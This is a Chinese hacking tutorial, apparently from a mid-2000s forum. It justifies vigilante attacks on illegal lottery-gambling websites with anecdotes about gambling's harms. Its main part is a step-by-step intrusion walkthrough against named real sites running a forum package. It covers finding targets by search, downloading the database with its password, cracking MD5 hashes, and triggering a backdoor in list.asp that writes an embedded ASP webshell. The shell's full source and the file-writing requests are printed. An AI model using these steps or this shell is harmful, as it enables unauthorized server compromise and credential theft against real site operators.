前言:
一、六合彩的危害(事例)
1、八十岁老太跳楼身亡。某村年逾八十的老太太罗某,家境并不富裕,
祖孙三代挤在三间小土房里,两个儿子外出打工五年挣了三万多块钱,
交给老太太保存,准备明年建造新房用。老太太先是厌恶买码(六合彩),
后因为见本村有一老太太买码赢了两万元,便心动起来。
先用自己的私房钱买,想哪一天也赢个两、三万,结果越买瘾越大,
买掉了自己多年积攥的三千多元私房钱后,输红了眼,
把儿子们积攥建房的三万多元也买掉了,后觉得无脸见儿子,
跑上庄家的楼房上纵跳下身亡,令人叹息不已。
2、吃不起肉的村庄。在某个上千人的村庄,却没有一家人买肉吃,
是这个村的都信教吃素吗?非也!据说这个村的人为了买码,
不仅自家的钱输光了,而且在自己外村的亲戚处还借了不少钱,
有的甚至是向亲戚骗来的。全村人穷得吃饭都成问题了,当然肉就不敢想了。
以前这个村村头有一个卖肉的地方,现在大家把猪卖了就去买码,
天天盘算着怎样赢回本钱,吃肉成了奢侈的欲望了。
这里我就拿来这两个例子,其实远远不止这些。六合彩引起的悲伤事例太多了,
引发打架斗殴是常事,许多盗窃案、抢劫案都因为赌输引起,走投无路、
家破人亡者大有人在。
二、六合彩屡禁不止的原因
六合彩是一种极具吸引力的赌博。例如,某村有一人用两千元中了二十万大奖,
这极大地刺激了买码的人,在赢得巨大额奖的诱导下,就上瘾或输红了眼,这样,
使许多人在六合彩面前不能自拔地陷了进去。他们总想某一天会把输掉的赢回来;
另一方面也不能否定六合彩具有神秘色彩和娱乐性,能激发许多彩民的冒险兴趣、
发财欲望。例如:六合彩有特码网站,还有什么码报。相信这些都是大家所熟知的,
里面一些谶语让人去思考,而一到出了奖,又能牵强附会地跟特码网站上的资料联系起来,
具有一定的神秘性。这就是六合彩屡禁不止的原因。
三、我们应该怎么做
有人在QQ的个性签名上这样写道:什么是黑客,黑客就是一群既要当婊子又要立牌坊的网络
流氓。有的时候我也在想难道所谓的黑客就是专门在别人网站上挂马攒钱的人吗?
或者是每天都在网上找一些安全低的网站进去后,根本不通知管理员,而是直接改掉人家主页,
挂上自己的QQ号,梦想有一天自己就这样出名了。(进班房)
另外我看到一篇报道,心里非常不是滋味。报道是这样的《3名女中学生历时11个月调查“六合彩”赌博活动》,
我就不发表评论了,我们来看一位老师的话:“当我们听到孩子们发自内心的声音时,
我们没有理由不思考。为了孩子,我们该做些什么,又能做些什么?”
本人作为一名还不是黑客的黑客,真的想知道我们应该做些什么?
取http://bbs.muwen.com/topic210/209519.htm 的一位id为
我恨六合彩 的朋友的话给大家看看,话是这样说的:
“买五元中生肖特码就可得二百块,哪有这么好中呢,
好多人因此而自杀,跳楼,这些码庄没有想过吗
希望能管管,这些网上的六合彩网站吧!!!!!”
我想这就是我们应该做的,拿百度搜这几个字“六合彩”相关的信息千千万,
为了被六合彩毒害的人,为了我的家乡岳阳,我决定写下下面的文章。
期望着大家一起走到打击六合彩网站的道路上来!消减它们,国家的害虫……
--------------------------------------------------------------------------------------------------
正文:
大家可能看过我原来的一篇文章,名字叫“侵入最大的六合彩论坛系统---六合专用BBS”
上面就介绍了怎样下载,六合专用BBS v1.0、六合专用BBS v2.0、六合专用BBS v3.0
的数据库,我们就从这里说起,可能有没有看过的朋友,那么我把这一部分再做一遍。
先在 baidu 搜 “六合专用BBS v1.0”当然你搜 v2.0 、v3.0 都可以!
“找到相关网页约23,000篇,用时0.017秒”我们看一下非常多的,随便进一个吧。
http://www.ky8888.com/bbs/list.asp
找到Domain2.2.exe,的 SearchPage.txt,
在里面加查找页 /fdnews.asp /bbs/fdnews.asp,好了现在我们来扫扫看!
哇,好多啊,这个就是数据库了,我们用网际快车 把他下下来,
昏 ,打开要密码,就密码这个东西啦: newbbs.cn88 ,现在 帐号、密码,
就尽收眼底了,嘿嘿!~~
现在把 md5 加密的东西放 MD5Crack 2.3 去跑吧,看你运气咯!~
不过我们今天要的不是它的密码,而是webshell。大家跟我来,马上会有惊人的
发现。打开数据库的zl表,找到idto 的字段,怎么了发现什么了吗?
这个好象是一个网页哦,嘿嘿!~~
代码如下:
1<html><head><meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
2<title></title>
3<meta content="Microsoft FrontPage 3.0" name="GENERATOR"/>
4</head>
5<body bgcolor="#FFFFFF">
Function GetPP
dim s
s=Request.ServerVariables("path_translated")
GetPP=left(s,instrrev(s,"",len(s)))
End function
MODE=Request("MODE")
sPP=Request("PP")
if sPP="" then sPP=GetPP
if right(sPP,1)<>"" then sPP=sPP&""
Response.Write "<b>Index of "&sPP& "</b>"
fname=request("fname")
if fname<>"" then
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if request("save")="" then
Set objCountFile = objFSO.OpenTextFile(fname,1,True)
If Not objCountFile.AtEndOfStream Then fdata = objCountFile.ReadAll
else
fdata=request("fdata")
Set objCountFile=objFSO.CreateTextFile(fname,True)
objCountFile.Write fdata
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
end if
1<form method="POST">
2<table bgcolor="#000000" border="0" cellspacing="0">
3<tr>
4<td><table bgcolor="#FFFFFF" border="0" cellpadding="10" cellspacing="0">
5<tr>
6<td><table bgcolor="#FFFFD0" border="1" bordercolor="#0080FF">
7<tr>
8<td bgcolor="#0080FF"><font color="#FFFFFF">change:```
9=fname
10```</font></td>
11<tr>
12<td><input name="save" type="submit" value="ok"/><input type="reset" value="reset"/><br/>
13<textarea cols="100" name="fdata" rows="22">```
14=fdata
15```</textarea></td>
16</tr>
17</tr></table>
18</td>
19</tr>
20</table>
21</td>
22</tr>
23</table>
24</form>
25</body>
26</html>
再认真看看,其实这就是一个webshell,所有的六合彩专用论坛的数据库里面都有。
它出生的时间可能比海洋顶端2003 还要早,是asp木马界的鼻祖了。
既然数据库的文件名是asp的后缀,而里面又自带一个asp木马,我们来试试直接打开这个数据库地址,
http://www.ky8888.com/bbs/fdnews.asp
昏,可以看出木马里面的asp 代码并没有执行,也就是说我们拿了一只死马。
这就是我12月25号的号的发现,拿到这个之后就和兄弟 ☆罹天烬☆ 讨论过(czy也给予了帮助),
开始认为只要拿到网站在服务器上的绝对路径就可以在本地提交,写入我们自己的木马,但是实验却一直没有成功。
虽然我手里有一个这样的论坛,但是有几个重要的页面丢失了,一时也看不出一个所以然来,这样一拖就是十几天,
前天我再把这个论坛的代码拿出来看,在list.asp 里面发现一段重要的东西.
1
2if len(page)>6 then
3if md5(md5(page))="8f9fc56c3d174202" then
4dim fname
5fname=""&sPP&"pags.asp"
6Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
7Set objCountFile=objFSO.CreateTextFile(fname,True)
8objCountFile.Write ""& idto &""
9objCountFile.Close
10Set objCountFile=Nothing
11Set objFSO = Nothing
12
13response.write "SORRY
<br/>
1"
2response.write "ID?????"
3response.end
4end if
注意到了吗?""& idto &"" 这里的idto 不就是数据库里面放asp木马的字段吗?
嘿嘿,那么上面的pags.asp,就应该是写入的文件名咯?我们来试试看,到底是不是这样的!
提交:http://www.ky8888.com/bbs/pags.asp
看到没有这个古老的asp木马终于显身了,首先它可以看到网站在服务器上的绝对路径,第二还
可以写入文件。有人看到这个木马很郁闷,因为它根本没有写入文件的路径的设置表单,是不是
我们提交的数据库,都进了数据库了呢?
来看看原代码,这一句 Set objCountFile = objFSO.OpenTextFile(fname,1,True)
看这里是写入了文件fname, 而不是数据库,我们先要请求文件fname 写入的路径,
在ie 提交:http://www.ky8888.com/bbs/pags.asp?fname=D:\ky8888\bbs\haotian.asp
再填内容 ,嘿嘿· ok 了 !,这样D:\ky8888\bbs\haotian.asp 就是我们新建的文件了。
因为这个网站空间不支持fso,所以我直接把数据库里面的木马复制到朋友的asp空间去演示,
看是不是写入文件成功了,嘿嘿!~~http://lvhuana.somee.com/haotian.asp?id=1
这样简单就拿到了webshell,不过我试了另外几个六合彩网站却没有发现这个pags.asp,看来这个里面
还有东西要挖一挖。可能要等到拿了完整的 六合专用BBS 的代码之后问题就都解决了。
本文只是起到抛砖引玉的作用,还是那句话期望着大家一起走到打击六合彩网站的道路上来!
消减它们,国家的害虫……
我在写本文的同时,也有很多人和我说,现在地下足彩也很泛滥,所以我专门联系了一位国内的黑足彩
高手,他将在近期出一篇关于消减足彩网站的文章。(完)
相关动画下载:http://soft.hackbase.com/62/20050215/6180.html